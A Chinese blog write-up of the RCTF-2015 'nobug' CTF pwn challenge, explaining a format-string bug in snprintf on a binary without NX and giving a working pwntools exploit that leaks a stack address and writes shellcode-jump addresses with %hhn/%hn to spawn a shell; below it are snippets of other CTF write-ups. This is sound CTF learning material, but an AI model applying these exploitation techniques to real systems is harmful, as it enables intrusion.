RCTF-2015 nobug

最新推荐文章于 2022-04-28 11:39:30 发布
最新推荐文章于 2022-04-28 11:39:30 发布
阅读量706 收藏 1
点赞数
分类专栏: 题目 xctf 文章标签: ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/106607824
版权
题目 同时被 2 个专栏收录
83 篇文章 2 订阅
订阅专栏
xctf
5 篇文章 0 订阅
订阅专栏

思路

有一个格式化字符串的漏洞

int sub_8048B32()
{
  int v0; // eax
  const char *v1; // eax

  v0 = strlen(s);
  v1 = sub_804869D(s, v0, 0);
  return snprintf(byte_804A8A0, 0x800u, v1);
}

题目没有开nx我们可以直接布置好shellcode然后跳过去观察栈发现一个地方可以利用

.text:08048BD7                 sub     esp, 18h
.text:08048BDA                 call    sub_8048B76
.text:08048BDF                 mov     dword ptr [esp], offset byte_804A8A0 ; s
.text:08048BE6                 call    _puts
.text:08048BEB                 leave
.text:08048BEC                 retn

然后就是非栈上的格式化字符串的利用了
通过改写ebp的指针然后再次写入上一个函数的ebp就可以改写栈上的指针
ebp通常都是函数调用栈的信息保存有上一个函数的ebp地址32位的好像是这样因为有leave这个操作然后函数调用会有push ebp么就会此函数的ebp会指向上一个函数的ebp
引荐师傅的exp:

from pwn import *
import base64
bs64=lambda data:base64.b64encode(data)
p=process('./magic')
#p=remote('220.249.52.133',58049)
sh_add=0x0804A0A0
shellcode=asm(shellcraft.sh())
p.sendline(bs64('%4$p'))
p.recvuntil('0x')
t_g=int(p.recvuntil('\n',drop=True),16)+4
log.success('t_g: '+hex(t_g))
payload=bs64(shellcode+'%'+str((t_g&0xff)-len(shellcode))+'c%4$hhn%'+str((sh_add&0xff)-(t_g&0xff))+'c%12$hn')
p.sendline(payload)
p.interactive()
doudoudedi
关注
专栏目录
Spring连环CVE-2015-5211和CVE-2020-5421漏洞升级教程!
xmt1139057136的专栏
08-14 2132
你知道的越多,不知道的就越多,业余的像一棵小草!你来,我们一起精进!你不来,我和你的竞争对手一起精进!编辑:业余草推荐:https://www.xttblog.com/?p=5259我们不...
RCTF2021-Re-WriteUp
m0_46498968的博客
09-13 508
太菜了 只会做两个简单题 不过还是从这个比赛学习到挺多东西 Ghidra使用啊 位运算啊 angr IR啊什么的 感谢出题人! Hi!Harmony! IDA7.6反编译失败 尝试使用Ghidra成功反编译 查找字符串交叉引用找到关键的加密函数 EXP: #include <stdio.h> const char table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; int main() { char str[] = { 0x48 ,0x41 ,0x52
攻防世界-PWN进阶区-welpwn(RCTF-2015)
weixin_44145820的博客
02-27 1082
题目分析 首先看一下开了哪些保护 因为开了NX,所以考虑使用ROP或者return-into-libc 用IDApro分析一下源代码 可以看出main函数中不存在注入点,我们看一下echo函数 在eho函数中,缓冲区至分配了0x10大小,但是传入的buf有0x400字节,因此可以看出存在溢出 不过拷贝遇到\x00就停止了,这个时候我们只能注入一个返回地址。 但是在ROPgadget里面能找到...
[XCTF-pwn] 33_rctf-2015_nobug
weixin_52640415的博客
03-10 424
格式化字符串漏洞 snprintf 程序先读入串,再用snprintf输出,由于snprintf有长度限制,每次只能一位一位的改。 int sub_8048B76() { size_t v0; // eax const char *v1; // eax v0 = strlen(s); v1 = (const char *)sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, "%s", v1); } 思路:
[RCTF2019]disk
qq_51447967的博客
04-28 514
题目分析 首先原题是有提示的 An otaku used VeraCrypt to encrypt his favorites. Password: rctf Flag format: rctf{a-zA-Z0-9_} 下载得到一个vmdk文件,看起来是虚拟机的磁盘文件。 VMDK:(VMWare Virtual Machine Disk Format)是虚拟机VMware创建的虚拟硬盘格式,文件存在于VMware文件系统中,被称为VMFS(虚拟机文件系统) 然后用txt格式打开后搜索CTF得到如下
实验吧之2015RCTF(misc)
weixin_30929295的博客
05-04 500
参考链接: https://blog.csdn.net/lamdasniper/article/details/78591650 写的真好!!! 转载于:https://www.cnblogs.com/BASE64/p/10809931.html
RCTF-2015-notsequence WP
qq_41252520的博客
09-05 1468
前言 这道题目有多解,但是只有一组解是flag。再次提醒自己,搞逆向的数学一定要学好,至少大学之前的数学还能有印象! 分析 程序无花无壳,直接IDA反编译。 结构很清晰,分别来看这两个 check 函数。 通过测试可以得知这些 下标 的含义,如果我们用符号来作为输出,就会很清晰了: 然后这个函数检测的就是行 i 的数字之和 v3 = 2i。其实数学好的话,仅看这个函数就立马想到是 杨辉...
rctf
zhang14916的博客
05-24 568
baby-crtpto: 阅读源码发现程序首先要求我们输入username和password,然后对cookie“admin:0;username:%s;password:%s"做aes-cbc加密,然后计算sha1(key+cookie),最后将AES-cbc的iv,密文和sha1的值连接在一起返回给我们。要求我们输入相同形式的字符串,并要求cookie中存在"admin"="1"且验证sha...
攻防世界PWN之Nobug题解
seaaseesa的博客
12-20 1331
Nobug 首先,检查一下程序的保护机制 PIE和NX没开,那么,我们可以轻松的布置shellcode到栈里或bss段或堆里,然后跳转。免去了泄露libc地址这些。 然后,我们用IDA分析一下 看似好像这里sprintf不存在漏洞,我们再看看其他函数 看见一个很复杂的函数,我们看看那个地址处是什么 是查表法,看起来像某种加密或解密算法,又由于不需要秘钥,我们推测可能是b...
no-bug:no-bug没毛(病)币
02-18
no-bug /没毛(病)币 项目名no-bug /没毛(病)币 项目介绍一个基于Java语言的(k8s +区块链)学习演示 项目开始时间2021-02 。。。。。 ......
rctf:redpwnCTF平台
03-28
rCTF是redpwnCTFCTF平台。 它由 CTF团队开发和维护。 入门 要开始使用rCTF,请访问文档在 如果您需要有关rCTF的帮助,请加入并在#rctf-help频道中提问。 使用rCTF部署挑战 rCTF本身不处理挑战性部署。 (可选)您可以使用部署挑战。 它与rCTF高度集成。 发展 我们将竭诚为您服务! 请参阅 。
WebSphere Comments Collections组件反序列化漏洞(CVE-2015-7450)
热门推荐
草衣的博客
05-30 1万+
刚刚完成了一个项目,在上线之前请求安全部门进行漏洞扫描,其中有一个漏洞名称是“WebSphere Comments Collections组件反序列化漏洞(CVE-2015-7450)”,按照扫描结果的提示解决方案,成功解决了,先分享一下。 详细描述 Apache Commons Collections可以扩展或增加Java集合框架,是Commons Prope
RCTF-RCalc WP
qq_41252520的博客
07-28 633
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
RCTF-misc-coocat wp
qq_53755216的博客
09-15 573
coolcat writeup I am honored to give a misc challenge for RCTF( forgive me for my poor english plz The challenge comes from an article
RCTF-2015——welpwn
05-11 334
64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
[RCTF2019]printer详解(python脚本、USB协议精解、TSLP2文档阅读)
qq_45699846的博客
04-05 2396
BUUCTF [RCTF2019]printer详解,文章对题目中的USB流量进行精解、TSLP2文档关键内容解读,对新手比较友好
[RCTF 2019]Nextphp
Sk1y的博客
01-22 1482
php7.4的FFI扩展的安全问题以及利用 c标准库的加载
RCTF2020_nowrite(libc_start_main的妙用+盲注)
seaaseesa的博客
06-11 1505
RCTF2020_nowrite(libc_start_main的妙用+盲注) 首先,检查一下程序的保护机制 检测一下沙箱,发现仅能进行open、read、exit操作,write操作都不行。 然后,我们用IDA分析一下,是一个及其简短的栈溢出程序 程序中没有输出,并且write也禁用了,也没有open函数,execve也禁用了,FULL RELRO也不能进行ret2dl,那么本题只能进行盲注,我们还需要构造出一个open系统调用。但是几乎没有可用的地方可以给我们构造。 找到一条有用的
RCTF 2015 welpwn [ROP] [x64通用gadgets] [简单写法]
ACdream
01-26 384
https://blog.csdn.net/u011987514/article/details/70232881 按照自己习惯,代码重写一下: #!/usr/bin/env python # coding=utf-8 from pwn import * io = process("./welpwn") #gadgets p4r = 0x40089C pr = 0x4008A3 mai...
Kubernetes -- no route to host的BUG解决
最新发布
12-01
针对Kubernetes中出现的"No route to host"错误,可以尝试以下解决方法: 1. 停止kubelet和docker服务,清空iptables规则,然后重新启动kubelet和docker服务。具体命令如下: ```shell systemctl stop kubelet systemctl stop docker iptables --flush iptables -tnat --flush systemctl start kubelet systemctl start docker ``` 2. 查看出现问题的Pod的日志信息,可以使用kubectl logs命令。例如,查看名为coredns-5897cd56c4-djm82的Pod的日志信息,命令如下: ```shell kubectl logs coredns-5897cd56c4-djm82 -n kube-system ``` 如果以上方法无法解决问题,可以进一步排查网络配置、DNS配置等问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值